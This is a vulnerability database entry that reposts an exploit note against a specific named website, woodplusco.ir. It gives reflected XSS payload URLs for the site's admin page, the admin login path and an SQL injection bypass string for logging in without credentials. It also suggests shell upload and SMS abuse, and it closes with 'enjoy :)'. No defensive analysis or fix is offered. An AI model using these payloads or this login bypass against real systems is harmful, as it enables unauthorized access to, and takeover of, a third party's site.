woodplusco ir SQL Injection & XSS vulnerability - CXSecurity.com

Vulnerability ID: 1841736    Vulnerability type:
Published: 2019-11-30    Updated: 2019-11-30
CVE ID: N/A    CNNVD-ID: N/A
Platform: N/A    CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2019110180
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
# Exploit Title: www.woodplusco.ir bypass admin login page & XSS vulnerability

# Date: 30/11/2019

# Exploit Author: nightr4id
# Tested on: Windows

# XSS Demo
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(XSS)</alert>
https://www.woodplusco.ir/admin/colors.php?msg=<script>alert(123)</script>

# Admin control panel path

https://www.woodplusco.ir/admin/login.php    

# user & pass: '=' 'or'
 
# Note: You can use other facilities such as Shell Upload and SMS messaging.

enjoy :)